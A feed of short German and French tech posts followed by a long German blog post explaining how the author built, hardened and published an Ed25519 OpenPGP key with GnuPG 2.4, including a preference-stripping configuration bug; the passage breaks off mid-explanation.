Viel Reibung in den Abläufen - unstrukturierte Arbeitsweisen(letztes Protkoll von Sitzung liegt in WhatsApp)
Hand hoch wer es kennt ✋
Jetzt im Urlaub und am Vorbereiten der Einschulungsfeier - mit zu viel #resttoken am ende der Woche - ist es passiert...
Ich hab das was ich die letzten Monate auf Arbeit gelernt habe auf mich selbst angewendet...
Lets do vibeops in förderverein
1. Schritt - ionos vps s gemietet
2. Schritt - #hermes drauf installiert
3. Schritt - #glm52 zur party eingeladen
4. Schritt - Homepage gebaut
5. Schritt - mit #syncthing / #filebrowser eine einfachen gemeinsamen Storage angelegt
6. Schritt - hermes mit cronjobs zur selbstverwaltung eingestellt (update / watchdog)
7. Schritt - aus meinem Datenmüll aus verschiedenen Dateien eine neue parallel Workflow basierte Ordnerstruktur aufgebaut (na klar mit hermes) - kann man auch noch als WebApp weiter spinnen
Ein bissel Fehler behoben und das Mitglied werden PDF interaktiv erstellen lassen
Arbeitszeit 3h
Wenn man das jetzt weiter spinnt können wir uns da jetzt unsere mitgliederdatenbank anlegen - vllt irgendwann die buchhaltung darüber laufen lassen
Monatlich 1€ für VPS - 0,50€ für die URL
jetzt müssen die anderen Vorstände sich das mal anschauen
krass was mal wieder aus eine impuls passieren kann - früher irgendwie joomla augesetzt und dann die lust verloren - jetzt booooooom
🔹 Plus de choix matériel : Idéal pour diversifier vos serveurs ou tester de nouvelles architectures.
Une excellente nouvelle pour réduire la consommation d'énergie sans sacrifier les fonctionnalités !
📖 Pour lire le communiqué officiel complet : https://www.proxmox.com/en/about/company-details/press-releases/proxmox-virtual-environment-launches-official-arm64-support
#Proxmox #ARM64 #OpenSource #Virtualisation #Linux #SysAdmin
Did I NOT just do kernel updates Friday?
Yes, yes I did.
Do I think I can get away with updating and rebooting without anyone noticing?
Yes, yes I do.
Moin. Im letzten Beitrag ging es darum, wie ich meinen OpenPGP-Schlüssel an Domain, GitHub und Matrix gebunden habe, also um die Frage, woher eigentlich irgendwer wissen soll, dass dieser Schlüssel mir gehört. Ganz am Ende stand dort die Ankündigung eines zweiten Teils: wie das Ding überhaupt gebaut ist und wie sicher es wirklich ist. Der Teil ist jetzt hier.
Der Beitrag hat zwei Hälften, und die kannst du unabhängig voneinander lesen. Teil A ist ein Rezept. Wenn du einen Schlüssel nach demselben Muster bauen willst, arbeitest du dich von oben nach unten durch, inklusive der kompletten GnuPG-Konfiguration, alles kopierbar und in der richtigen Reihenfolge. Teil B erklärt, was die einzelnen Bauteile bedeuten, und endet mit einer ehrlichen Einschätzung, wie sicher das alles am Ende ist.
Der eigentliche Grund, warum ich das aufschreibe, ist aber ein anderer. Zwischen „mein Schlüssel ist modern“ und „mein Schlüssel ist richtig konfiguriert“ liegt eine Lücke, und in die bin ich mit Anlauf hineingesprungen. Der Schlüssel ist Lehrbuch: Ed25519, ein Hauptschlüssel, der ausschließlich zertifiziert, drei getrennte Unterschlüssel, fünf Jahre Laufzeit, über sieben Kanäle veröffentlicht, dazu eine eID-Zertifizierung. Und trotzdem wurde er vom ersten Tag an schwächer angesprochen als der Schlüssel, den er ablöst.
Aufgefallen wäre das niemandem, und genau das ist der interessante Teil. Das einzige Symptom war eine Warnzeile auf dem Terminal von jemandem, der mir eine verschlüsselte Mail schreibt. Also auf einem Rechner, den ich nie zu Gesicht bekomme. Und die Ursache war ausgerechnet eine Härtungsmaßnahme, die ich in bester Absicht eingebaut hatte, um einen musealen Algorithmus loszuwerden. Härtung, die etwas leise verschlechtert, finde ich als Geschichte deutlich spannender als noch eine Schlüsselerzeugungsanleitung. Nachbauen kannst du das übrigens in zwei Minuten, das Labor dazu steht weiter unten.
Bestandteil
Wert
Hauptschlüssel
ed25519 0x893DE0CDDE986DEB, Verwendung [C], also nur zertifizieren
Fingerabdruck
45FC D081 ADB5 4872 EA5B 06B9 893D E0CD DE98 6DEB
Signatur-Unterschlüssel
ed25519 0xD788641D8588A674
Verschlüsselungs-Unterschlüssel
cv25519 0x429D03637892821A
Authentisierungs-Unterschlüssel
ed25519 0x22F2E3234664DDBE
UIDs
Sebastian van de Meer, dazu eine Foto-UID mit 10851 Byte
Gültigkeit
erzeugt am 24.07.2026, läuft am 23.07.2031 ab
Vorgänger
ed25519 0x5F279C362EEAB216, gültig bis 31.12.2026, zeichnet den neuen gegen
Fremdzertifizierung
Governikus/eID 0x5E5CCCB4A4BF43D7, Level 3
Umgebung
GnuPG 2.4.4, libgcrypt 1.10.3
Die Aufgabenteilung steht nicht nur in der Doku, die steht maschinenlesbar im Schlüssel selbst. Jede Bindungssignatur trägt ein Feld mit Schlüssel-Flags, und das sieht bei mir so aus:
primary key flags: 01 certify [S] key flags: 02 sign [E] key flags: 0C encrypt communications + encrypt storage [A] key flags: 20 authenticate
Teil A ist der Ablauf, den ich für richtig halte, und bis auf die markierten Stellen genau der, den ich gegangen bin. Dort, wo der Befehl unten besser ist als das, was ich damals getippt habe, steht ein Hinweis dazu.
gpg --version # gpg (GnuPG) 2.4.4 # libgcrypt 1.10.3
GnuPG 2.4.x ist die Annahme für den ganzen Beitrag. Zwei Dinge gleich vorweg, weil sie sonst später wehtun:
--quick-generate-key verweigert den Dienst, wenn die UID bereits auf einem anderen Schlüssel im Schlüsselbund existiert. Genau deshalb ist dieser Schlüssel über eine Parameterdatei mit --batch --gen-key entstanden. Das trifft dich zuverlässig genau dann, wenn du einen Schlüssel rotierst, also in dem Moment, in dem der alte noch da ist.Wenn du bei GPG ganz am Anfang stehst, sind die Grundlagen zum Signieren und Verschlüsseln hier im Blog der bessere Einstieg. Dieser Beitrag setzt voraus, dass du weißt, was ein öffentlicher Schlüssel und ein Unterschlüssel sind.
Und zwar wirklich vorher, nicht hinterher. Mein ~/.gnupg war in einem Zustand, den ich hier nur ungern zugebe.
chmod 700 ~/.gnupg
find ~/.gnupg -type f -exec chmod 600 {} +
# Erst alle GnuPG-Frontends schließen und die Daemons beenden, sonst löschst du
# unter Umständen echte, aktive Locks:
gpgconf --kill all
# Übriggebliebene Lock-Dateien abgestürzter Läufe. Bei mir waren es 93 Stück.
find ~/.gnupg -name '.#lk*' -delete
# Altlasten, die keine 2.4er Installation mehr braucht
mkdir -p ~/gnupg-attic-$(date +%F)
mv ~/.gnupg/{cert8.db,key3.db,secmod.db} ~/gnupg-attic-$(date +%F)/ 2>/dev/nullEin ~/.gnupg mit 775 und Dateien mit 664 ist erschreckend verbreitet, und ich will das gar nicht größer machen als es ist: Auf einem Einzelplatzrechner ist das keine Katastrophe. Es wird aber genau in dem Moment eine, in dem das Home-Verzeichnis in ein Backup, in einen Container-Mount oder in einen synchronisierten Ordner wandert. Und das passiert schneller, als man denkt.
Das ist die tatsächlich laufende Konfiguration, so wie sie bei mir liegt, mit ihren Originalkommentaren. Der Block mit dem Warnhinweis ist die wichtigste Stelle im gesamten Beitrag, warum, steht in Teil B.
# ---- UX / output ---- keyid-format 0xlong with-fingerprint with-subkey-fingerprint utf8-strings # ---- Key discovery (local first, then WKD/DANE; email-validated keyserver last) ---- auto-key-retrieve auto-key-locate local,wkd,dane,keyserver keyserver hkps://keys.openpgp.org # ---- Strong defaults ---- # cipher-algo / digest-algo are intentionally NOT forced: forcing them would override # the recipient's stated capabilities. personal-*-preferences below select strong # algorithms interoperably instead. cert-digest-algo SHA512 # ---- KDF hardening for passphrase-derived symmetric keys (gpg -c / key export) ---- s2k-mode 3 s2k-digest-algo SHA512 s2k-cipher-algo AES256 s2k-count 65011712 # ---- WARNING. Legacy ciphers: do NOT disable 3DES here ---- # An earlier version of this file carried: # disable-cipher-algo 3DES # disable-cipher-algo IDEA # disable-cipher-algo CAST5 # disable-cipher-algo BLOWFISH # disable-cipher-algo TWOFISH # The 3DES line alone silently strips ALL algorithm preferences from every key you # generate while it is active, and it also blocks DECRYPTION of old archives. # New encryption never selects a legacy cipher anyway, because # personal-cipher-preferences lists AES only. # ---- Privacy / minimal metadata ---- no-comments no-emit-version export-options export-minimal # ---- Listing/verification quality-of-life ---- verify-options show-uid-validity list-options show-uid-validity # ---- Trust model ---- trust-model tofu+pgp # ---- Your key ---- default-key 0x45FCD081ADB54872EA5B06B9893DE0CDDE986DEB # hidden-encrypt-to 0x45FCD081ADB54872EA5B06B9893DE0CDDE986DEB # optional, off # ---- Local policy: what *you* prefer when sending ---- personal-cipher-preferences AES256 AES192 AES personal-digest-preferences SHA512 SHA384 SHA256 weak-digest SHA1 force-ocb # ---- Preferences baked into keys you create from here on ---- default-preference-list SHA512 SHA384 SHA256 AES256 AES192 AES ZLIB BZIP2 ZIP Uncompressed
Zwei Zeilen darin sind Entscheidungen und keine Selbstverständlichkeiten, deshalb je ein Satz dazu.
force-ocb ist keine Präferenz, sondern eine Erzwingung. Es sorgt dafür, dass ausgehende Nachrichten die OCB-Variante aus der LibrePGP-Linie benutzen, und setzt sich dabei über das hinweg, was der Empfängerschlüssel ankündigt. Sehr alte oder anders implementierte Empfänger können solche Nachrichten nicht lesen. Das steht in einer gewissen Spannung zu dem Prinzip ein paar Zeilen weiter oben, wo ich cipher-algo bewusst nicht erzwinge. Für mich ist das in Ordnung, in einer Konfiguration zum Abschreiben würde ich die Zeile weglassen.auto-key-retrieve holt unbekannte Schlüssel beim Prüfen automatisch nach. Sehr bequem, und es verrät dem Keyserver, welche signierten Nachrichten du wann liest. Für mich ein akzeptabler Tausch, bei einem anderen Bedrohungsmodell schaltest du das besser ab.Dazu die beiden kleinen Geschwisterdateien. gpg-agent.conf:
enable-ssh-support default-cache-ttl 180 max-cache-ttl 600 pinentry-program /usr/bin/pinentry-gnome3
Und dirmngr.conf:
honor-http-proxy disable-ldap
Ein Hauptschlüssel, der nur zertifiziert, über eine Parameterdatei. Die Zeile Preferences: war in meinem echten Lauf nicht drin, nimm sie mit. Sie kostet nichts und fängt genau den Fehler ab, um den es in Teil B geht. Das ist keine Vermutung, ich habe es nachgemessen: Mit dieser Zeile bleiben die Präferenzen selbst dann im Schlüssel, wenn die defekte Konfiguration aktiv ist. Die eigentliche Kontrolle bleibt trotzdem der Paket-Dump gleich darunter, denn eine Parameterdatei ersetzt nie die Prüfung des fertigen Artefakts.
cat > keyparams.txt <<'EOF' Key-Type: eddsa Key-Curve: Ed25519 Key-Usage: cert Name-Real: Sebastian van de Meer Name-Email: kernel-error@kernel-error.com Expire-Date: 5y Preferences: AES256 AES192 AES SHA512 SHA384 SHA256 ZLIB BZIP2 ZIP Uncompressed %ask-passphrase %commit EOF gpg --batch --gen-key keyparams.txt shred -u keyparams.txt
Und jetzt sofort nachsehen, ob die Präferenzen auch wirklich im Schlüssel gelandet sind. Genau diese Prüfung fehlte bei mir im Juli, und deshalb steht sie hier direkt hinter der Erzeugung und nicht irgendwo weiter unten.
gpg --export kernel-error@kernel-error.com | gpg --list-packets | grep -E 'pref-|features'
Du willst dort pref-sym-algos, pref-hash-algos, pref-zip-algos und ein features mit gesetztem Bit 0x01 sehen. Wenn dort nur eine features-Zeile steht und sonst nichts, dann hör hier auf und lies erst den Abschnitt über den Defekt in Teil B. Dann stimmt etwas mit deiner Konfiguration nicht, und der Schlüssel trägt den Fehler ab sofort dauerhaft mit sich herum.
Zum shred oben noch ein Wort, weil es sonst falsche Sicherheit erzeugt: Es entfernt die sichtbare Arbeitsdatei, mehr nicht. Auf SSDs, auf ZFS, bei Snapshots und auf journalenden Dateisystemen ist damit überhaupt nicht garantiert, dass keine alten Blöcke mehr herumliegen. Solche Zwischendateien sollten deshalb von vornherein nur auf einem verschlüsselten Dateisystem entstehen.
Interaktives --quick-add-key ist mir in einer nicht-interaktiven Shell mit einem /dev/tty-Fehler um die Ohren geflogen. Mit --batch läuft es durch.
FPR=45FCD081ADB54872EA5B06B9893DE0CDDE986DEB gpg --batch --quick-add-key $FPR ed25519 sign 5y gpg --batch --quick-add-key $FPR cv25519 encr 5y gpg --batch --quick-add-key $FPR ed25519 auth 5y
240×288 Pixel, Graustufen-JPEG, 10851 Byte. Halt das Bild klein, es reist in jedem vollständigen Export mit und ist der mit Abstand größte Posten in der Schlüsselgröße.
gpg --edit-key $FPR > addphoto > /pfad/zu/sebastian-photo-uid.jpg > save
Eine Sache dazu, die man vorher wissen sollte: Keiner der drei Keyserver, die ich benutze, hat die Foto-UID nach dem Upload je wieder herausgerückt. Für jeden Keyserver da draußen lege ich die Hand nicht ins Feuer, für die drei, auf die es ankommt, schon. Das Bild überlebt damit nur auf den Kanälen, die ich selbst hoste. Damit ist die Foto-UID Dekoration und keine Funktion. Das ist ein völlig legitimer Grund, sie trotzdem mitzunehmen, man sollte sich nur nichts vormachen.
Zwei Dinge müssen existieren, bevor der Schlüssel irgendwo landet: ein Backup des geheimen Schlüssels und ein Widerrufszertifikat. Beides später nachzuholen ist der Klassiker, den man genau einmal bereut.
gpg --export-secret-keys --armor $FPR > secret-key-backup.asc gpg --output revoke.asc --gen-revoke $FPR
Ein Widerrufszertifikat legt GnuPG bei der Erzeugung ohnehin schon selbst unter ~/.gnupg/openpgp-revocs.d/<FPR>.rev ab. Das Backup dagegen ist erst dann eines, wenn du es einmal zurückgespielt hast. Also rein damit in ein Wegwerf-GNUPGHOME und nachsehen, ob der geheime Hauptschlüssel dort auch wirklich auftaucht und nicht bloß die Datei lesbar war. Danach wandern beide auf Offline-Medien.
RESTORE=$(mktemp -d); chmod 700 "$RESTORE" gpg --homedir "$RESTORE" --import secret-key-backup.asc gpg --homedir "$RESTORE" --with-subkey-fingerprint --list-secret-keys $FPR rm -rf "$RESTORE"
Wichtig, weil es ein sehr verbreitetes Missverständnis ist: Der s2k-*-Block aus der gpg.conf betrifft den passphrasenbasierten Schutz, also etwa gpg -c und den Export. Er sagt nichts darüber aus, wie der geheime Schlüssel in ~/.gnupg auf der Platte geschützt ist. Darum kümmert sich der gpg-agent mit eigenen Parametern, und bereits vorhandenes Schlüsselmaterial wird durch eine geänderte gpg.conf nicht rückwirkend neu verpackt. Wer die beiden verwechselt, glaubt an eine Härtung, die an dieser Stelle gar nicht wirkt. Was tatsächlich in deinem Backup steht, siehst du wie immer am Artefakt selbst, per gpg --list-packets secret-key-backup.asc.
Jetzt kommt der Schritt, der die ganze Aufteilung von oben überhaupt erst einlöst. Der Hauptschlüssel hat im Alltag nichts verloren. Gebraucht wird er nur, wenn ein Unterschlüssel verlängert, ersetzt oder widerrufen wird, wenn eine UID dazukommt oder wenn du einen fremden Schlüssel zertifizierst. Also fliegt sein geheimer Teil vom Arbeitsrechner herunter, und zwar genau jetzt, nachdem Backup und Widerrufszertifikat existieren und nicht vorher.
# nur die Unterschlüssel exportieren, ohne den geheimen Hauptschlüssel gpg --export-secret-subkeys --armor $FPR > subkeys.asc # das gesamte geheime Material aus dem Alltags-Keyring werfen gpg --delete-secret-keys $FPR # und danach ausschließlich die Unterschlüssel zurückholen gpg --import subkeys.asc shred -u subkeys.asc
Kontrolliert wird das an einem einzigen Zeichen:
gpg -K # sec# ed25519/0x893DE0CDDE986DEB # ssb ed25519/0xD788641D8588A674 # ssb cv25519/0x429D03637892821A # ssb ed25519/0x22F2E3234664DDBE
Das Doppelkreuz hinter sec ist der ganze Punkt. Es bedeutet: GnuPG kennt den Hauptschlüssel, hat sein geheimes Gegenstück aber nicht mehr. Signieren, Entschlüsseln und Authentisieren laufen unverändert weiter, dafür sind die Unterschlüssel zuständig. Was nicht mehr geht, ist alles, was die Identität selbst betrifft, also neue Unterschlüssel anlegen, Laufzeiten verlängern, UIDs ergänzen und fremde Schlüssel zertifizieren.
Der geheime Hauptschlüssel liegt ab hier zusammen mit dem Widerrufszertifikat auf verschlüsseltem Wechselmedium. Wenn ich ihn brauche, kommt er ausdrücklich nicht zurück nach ~/.gnupg, sondern in ein temporäres GNUPGHOME, das hinterher wieder verschwindet.
Ein Detail dabei ist wichtig genug für einen eigenen Absatz, weil es sonst still danebengeht: Das Offline-Backup ist ein Schnappschuss. Es entstand oben, bevor der alte Schlüssel gegengezeichnet hat und bevor die Governikus-Zertifizierung da war. Diese Fremdsignaturen hängen am öffentlichen Teil, der im Alltags-Keyring liegt, nicht im Backup. Wer nur das Backup einspielt und dort arbeitet, exportiert hinterher einen Schlüssel, dem genau diese Signaturen fehlen. Also immer beides einspielen:
# aktuellen öffentlichen Stand samt Fremdsignaturen aus dem Alltags-Keyring mitnehmen gpg --armor --export-options no-export-minimal --export $FPR > /tmp/pub-aktuell.asc export GNUPGHOME=$(mktemp -d); chmod 700 "$GNUPGHOME" trap 'rm -rf "$GNUPGHOME"' EXIT HUP INT TERM # auch bei Abbruch aufräumen gpg --import /media/offline/secret-key-backup.asc gpg --import /tmp/pub-aktuell.asc # hier die Arbeit am Schlüssel, etwa eine Laufzeit verlängern gpg --armor --export-options no-export-minimal --export $FPR > /tmp/pub-neu.asc rm -rf "$GNUPGHOME"; unset GNUPGHOME
Danach importierst du die aktualisierte öffentliche Hälfte in den Alltags-Keyring und rollst sie über alle Veröffentlichungskanäle aus. Das ist unbequem. Es soll unbequem sein, denn genau diese Unbequemlichkeit ist der Grund, warum der Hauptschlüssel selten angefasst wird und deshalb schwer zu verlieren ist.
Ein weicher Übergang statt einer harten Kante: Der alte Schlüssel bleibt bis zu seinem Ablauf gültig und zertifiziert den neuen. Wer dem alten Schlüssel schon vertraut, bekommt damit einen kryptografischen Pfad zum neuen, ohne mich irgendwo anrufen zu müssen.
gpg --default-key 0x5F279C362EEAB216 --sign-key $FPR
Das ist ein eigenes Thema, deshalb hier nur zusammengefasst: Governikus ist nach meinem Stand vom August 2026 der einzige mir bekannte noch aktive Dienst in Deutschland, der OpenPGP-Schlüssel über die Online-Ausweisfunktion zertifiziert. Du schickst deinen öffentlichen Schlüssel hin, weist dich mit dem Personalausweis aus und bekommst eine Zertifizierung mit Level 3 zurück. Die Volksverschlüsselung fällt als Alternative aus, die macht ausschließlich S/MIME nach X.509, erzeugt die Schlüssel selbst und wird ohnehin eingestellt.
Strukturell wichtig für den Rest des Beitrags ist nur ein Punkt: Diese Zertifizierung ist eine Fremdsignatur. Und die Hälfte meiner Veröffentlichungskanäle wirft Fremdsignaturen weg. Warum, steht gleich.
Das ist der Teil, den fast alle Anleitungen überspringen, und ausgerechnet hier fallen die echten Entscheidungen. Vier verschiedene Exporte desselben Schlüssels für vier verschiedene Jobs, mit den gemessenen Größen der Artefakte, die tatsächlich ausgeliefert werden:
Artefakt
Befehl
Größe
Inhalt
minimal, ASCII
gpg --armor --export $FPR
16772 B
1 UID plus Foto, 3 Unterschlüssel, 5 Signaturen
vollständig, ASCII
gpg --armor --export-options no-export-minimal --export $FPR
17833 B
zusätzlich 3 Fremdsignaturen, also 8 Signaturen
WKD, binär
gpg --no-armor --export-options no-export-minimal --export $FPR
13108 B
wie vollständig, nur binär
DANE, binär minimal
siehe unten
1298 B
1 UID, kein Foto, 4 Signaturen
Alle vier Befehle habe ich gegen die live ausgelieferten Dateien geprüft, sie reproduzieren die Artefakte byteidentisch, sha256 stimmt jeweils überein. Du kannst sie also so übernehmen.
Und jetzt die fiese Falle. In meiner gpg.conf steht global export-options export-minimal. Export-Optionen summieren sich, sie ersetzen einander nicht. --export-options export-clean hebt export-minimal also nicht auf. Du bekommst weiterhin einen minimalen Export, still und ohne Warnung, mit weggeworfenen Fremdsignaturen. Nur die ausdrückliche Verneinung funktioniert:
gpg --export-options export-clean --export $FPR | gpg --list-packets | grep -c '^:signature packet:' # 5, immer noch minimal gpg --export-options no-export-minimal --export $FPR | gpg --list-packets | grep -c '^:signature packet:' # 8, korrekt
Das ist genau die Sorte Fehler, bei der du fest davon überzeugt bist, einen Schlüssel mit allen Signaturen veröffentlicht zu haben, während in Wahrheit die eID-Zertifizierung nie das Haus verlassen hat.
Die zweite Stolperfalle beim Export: export-minimal wirft zwar Fremdsignaturen weg, behält aber die Foto-UID. Für den DANE-Record muss auch das Bild raus, sonst wächst der Record von rund einem Kilobyte auf gute zwölf. Dieser Befehl hat den ausgelieferten Record mit 1298 Byte erzeugt:
gpg --no-armor --export-options export-minimal --export-filter keep-uid='mbox = kernel-error@kernel-error.com' --export $FPR > openpgpkey.bin
Zwei Anmerkungen noch zu den Formaten, weil sich in der 2.4er Reihe etwas geändert hat:
--print-dane-records gibt es nicht mehr. Der Nachfolger heißt --export-options export-dane.export-dane liefert einen fertigen DNS-Präsentationsblock, also $ORIGIN, Kommentarzeilen und generische TYPE61-Rdata, bei mir 25642 Byte. Das ist kein binäres Schlüsselmaterial. Zum Lesen ist es praktisch, der ausgelieferte Record entstand aber aus dem binären Export oben plus base64 -w0 openpgpkey.bin. Beide Wege sind gültige Zonefile-Syntax, RFC 7929 definiert die base64-Präsentationsform und RFC 3597 die generische TYPE61-Form, BIND frisst beides. Der Einzeiler passte einfach besser in meine bestehende Zone.Sieben Kanäle, und jeder existiert aus einem anderen Grund. Das „warum“ ist dabei die interessantere Hälfte:
Kanal
Format
Warum dieser Kanal
keys.openpgp.org
voll hochgeladen, Server wirft Signaturen und Foto weg
der einzige Keyserver, der die Mailadresse validiert, und der, den moderne Clients abfragen
keyserver.ubuntu.com
voll
klassischer SKS-Nachfolger, behält Fremdsignaturen
pgpkeys.eu
voll
zweiter Klassiker, Redundanz
DANE / OPENPGPKEY
minimal binär, 1298 B
Vertrauen hängt an DNSSEC statt an einem Signaturgraphen, muss klein bleiben, es ist ein DNS-Record
WKD advanced
kein eigener Export, CNAME auf wkd.keys.openpgp.org
spiegelt keys.openpgp.org automatisch, lässt sich hier nicht selbst hosten
WKD direct (Apex)
voll binär, 13108 B
selbst gehostet, deshalb die einzige Stelle mit Foto und Fremdsignaturen
security.txt und Direktdownload
voll ASCII, 17833 B
auffindbar für Menschen und für Scanner
Zwei abgeleitete Namen tauchen dabei auf, und die werden regelmäßig falsch gebildet. Beide habe ich unabhängig nachgerechnet, sie stimmen mit dem überein, was ausgeliefert wird:
# WKD: z-base32 des SHA-1 vom lokalen Teil, ASCII-Großbuchstaben vorher klein gemacht
# sha1("kernel-error") -> z-base32 -> 3gyjbxx9xfdggpkmx5qdd793xy431w5u
gpg --with-wkd-hash -k kernel-error@kernel-error.com
# DANE (RFC 7929): SHA-256 des kanonisierten UTF-8-Lokalteils, auf 28 Oktette gekürzt,
# hex-kodiert, dann ._openpgpkey.<domain>
# 70e1c7d87e825b3aba45e2a478025ea0d91d298038436abde5a4c2d0._openpgpkey.kernel-error.comZwei Präzisierungen, damit hier keine Regel steht, die breiter ist als die Spezifikationen: WKD bildet ASCII-Großbuchstaben auf Kleinbuchstaben ab, das ist kein allgemeines Unicode-Lowercasing. Und DANE übernimmt diese Abbildung nicht einfach, RFC 7929 hat seine eigene Kanonisierung des lokalen Teils. Bei mir fallen beide zusammen, weil kernel-error schon reines Kleinbuchstaben-ASCII ist. Genau deshalb ist mir der Unterschied nie begegnet. Wer einen Lokalteil mit Großbuchstaben oder Nicht-ASCII hat, darf die beiden auf keinen Fall gleichsetzen.
Und weil ich schon dabei bin, mich zu blamieren: Bei einem früheren Review habe ich DANE als „fehlt“ markiert, weil ich den z-base32-Namen aus WKD gegen das DNS geprüft habe. Also den falschen Namen. DANE lief die ganze Zeit. Wenn du deinen eigenen Aufbau prüfst, prüfe bitte den Namen, den die jeweilige Spezifikation vorschreibt, und nicht den, den du gerade im Kopf hast. Wie man einen OPENPGPKEY-Record überhaupt in die Zone bekommt und wie man die Zone dafür mit BIND signiert, steht hier im Blog.
Eine Konsequenz aus der Tabelle überrascht die Leute regelmäßig, deshalb schreibe ich sie deutlich hin:
Die Governikus-Zertifizierung ist nur auf den klassischen Keyservern und auf den selbst gehosteten Kopien sichtbar. keys.openpgp.org wirft sie weg, und gpg bevorzugt die WKD-advanced-Methode, die wiederum auf keys.openpgp.org zeigt. Der Kanal, den die meisten Clients benutzen, ist also ausgerechnet der mit den wenigsten Signaturen.
Der letzte Schritt in Teil A, und der wichtigste: Hol dir deinen eigenen Schlüssel so, wie es jemand tut, der dich nicht kennt. Einmal pro Suchpfad, jedes Mal in einem frischen Schlüsselbund.
# den Schlüssel holen wie ein Fremder, einmal pro Lookup-Pfad for m in dane wkd keyserver; do GNUPGHOME=$(mktemp -d) gpg --auto-key-locate clear,$m --locate-external-keys kernel-error@kernel-error.com done # welche Präferenzen bewirbt der Schlüssel tatsächlich? gpg --export $FPR | gpg --list-packets | grep -E 'pref-|features' # welchen Cipher wählt ein Absender wirklich? gpg --status-fd 1 -d message.gpg | grep DECRYPTION_INFO
Damit endet das Rezept. Ab hier geht es darum, was die Teile bedeuten, und um die Frage, wie sicher der Aufbau am Ende wirklich ist.
Wenn du bis hierher gekommen bist, hast du ein funktionierendes Rezept. Was du noch nicht hast, ist ein Gefühl dafür, warum die Teile so und nicht anders geschnitten sind, und wo der Aufbau trotz allem nachgibt. Genau darum geht es jetzt, und zwar in dieser Reihenfolge: erst die Struktur, dann die Zahlen, dann der Fehler und am Ende die Rechnung ohne Schönfärberei.
Der Hauptschlüssel hat genau eine Aufgabe: zu sagen, wer zu diesem Schlüssel gehört. Er signiert die UIDs und er signiert die Unterschlüssel. Er signiert nie eine Mail und entschlüsselt nie irgendetwas. Alles Operative ist delegiert:
[C] certify Identitätsanker. Wird selten benutzt. Eine Kompromittierung ist
nicht reparierbar, ein Verlust nur über das Offline-Backup.
[S] sign Signieren im Alltag
[E] encrypt Entschlüsseln im Alltag
[A] auth Authentisierung, etwa als SSH-SchlüsselDer Gewinn: Ein kompromittierter oder ausgedienter Unterschlüssel lässt sich widerrufen und ersetzen, ohne die Identität anzufassen, ohne die gesammelten Fremdsignaturen zu verlieren und ohne den Fingerabdruck zu ändern, der an sieben Stellen veröffentlicht ist. Dass [S] und [E] getrennt sind, hat noch einen zweiten Grund: Sie haben unterschiedliche Lebenszyklen. Einen alten Signaturschlüssel zu vernichten ist harmlos. Einen alten Verschlüsselungsschlüssel zu vernichten heißt, dass du an dein Archiv nicht mehr herankommst.
Das Ganze zahlt sich allerdings nur aus, wenn du auch die Konsequenz ziehst: Der volle Nutzen dieser Aufteilung stellt sich erst ein, wenn der Hauptschlüssel offline liegt. Genau deshalb liegt er hier offline, auf verschlüsseltem Wechselmedium und zusammen mit dem Widerrufszertifikat. Er kommt nur heraus, wenn ein Unterschlüssel verlängert, ersetzt oder widerrufen werden muss, und dann in ein temporäres GNUPGHOME und nicht zurück in den Alltags-Keyring. Auf der Arbeitsmaschine liegen ausschließlich die drei Unterschlüssel. Ein Hauptschlüssel, der nur zertifiziert, aber trotzdem neben dem Mailclient herumliegt, ist am Ende nur Kosmetik.
Der [A]-Unterschlüssel existiert übrigens, ist aber bewusst nicht im gpg-agent für SSH verdrahtet, sshcontrol ist leer. Ich habe ihn erzeugt, um mir die Option offenzuhalten. Mehr ist es im Moment nicht.
Ein Punkt dazu, den du im Kopf behalten solltest, weil er gleich noch wichtig wird: 128 Bit klassische Sicherheit sind die Obergrenze dieses Schlüssels. Merk dir die Zahl. Sie ist der Grund, warum die AES-Geschichte weiter unten weniger dramatisch ist, als sie zunächst klingt.
Dieses Konzept muss sitzen, sonst funktioniert die Geschichte danach nicht. Vorweg ein Satz, den viele nie gehört haben: Eine OpenPGP-Nachricht ist immer hybrid. Der asymmetrische Teil, also dein Ed25519- und X25519-Material, verpackt ausschließlich einen zufällig erzeugten symmetrischen Sitzungsschlüssel. Die eigentlichen Nutzdaten verschlüsselt ein symmetrisches Verfahren, in der Regel AES. Der Fehler, um den es gleich geht, saß in dieser symmetrischen Hälfte.
Ein OpenPGP-Schlüssel trägt nämlich nicht nur öffentliche Schlüssel spazieren. Die Selbstsignatur jeder UID enthält Subpakete, die ankündigen, was der Besitzer verarbeiten kann:
hashed subpkt 11 (pref-sym-algos: 9 8 7) AES256, AES192, AES128 hashed subpkt 21 (pref-hash-algos: 10 9 8) SHA512, SHA384, SHA256 hashed subpkt 22 (pref-zip-algos: 2 3 1 0) ZLIB, BZIP2, ZIP, unkomprimiert hashed subpkt 34 (pref-aead-algos: 2) OCB, fehlt auf diesem Schlüssel hashed subpkt 30 (features: 05) Feature-Bits, siehe unten hashed subpkt 23 (keyserver preferences: 80) "no-modify"
Das features-Oktett ist die Stelle, an der ich mich in meinen eigenen Notizen vertan hatte, deshalb hier die Dekodierung. In der Linie, die GnuPG 2.4 implementiert, bedeuten die Bits des ersten Oktetts:
0x01 SEIPD-v1 mit Modification Detection Code (MDC) 0x02 AEAD 0x04 Unterstützung für das v5-Schlüssel- und Fingerabdruckformat
features 05 ist also 0x01 + 0x04, das heißt MDC und kein AEAD. features 07 wäre 0x01 + 0x02 + 0x04, und genau das bekommt ein Schlüssel, den GnuPG 2.4 mit Standardeinstellungen erzeugt. Der kaputte Zustand war features 04, also 0x04 ganz allein: weder MDC noch AEAD angekündigt.
Eine Versionsfußnote gehört dazu: Diese Bitbelegung und das Subpaket 34 stammen aus der LibrePGP-Linie, die GnuPG 2.4 umsetzt. RFC 9580 hat beides geändert, dort sind die AEAD-Präferenzen in Subpaket 39 umgezogen und das Feature-Modell wurde umgebaut. Diese Spaltung kommt weiter unten noch einmal zurück.
Wenn dir jemand etwas verschlüsselt, liest dessen GnuPG deine Präferenzliste und wählt daraus das stärkste Verfahren, das beide können. Das ist der ganze Mechanismus. Daraus folgen zwei Dinge, die den meisten Leuten gegen den Strich gehen:
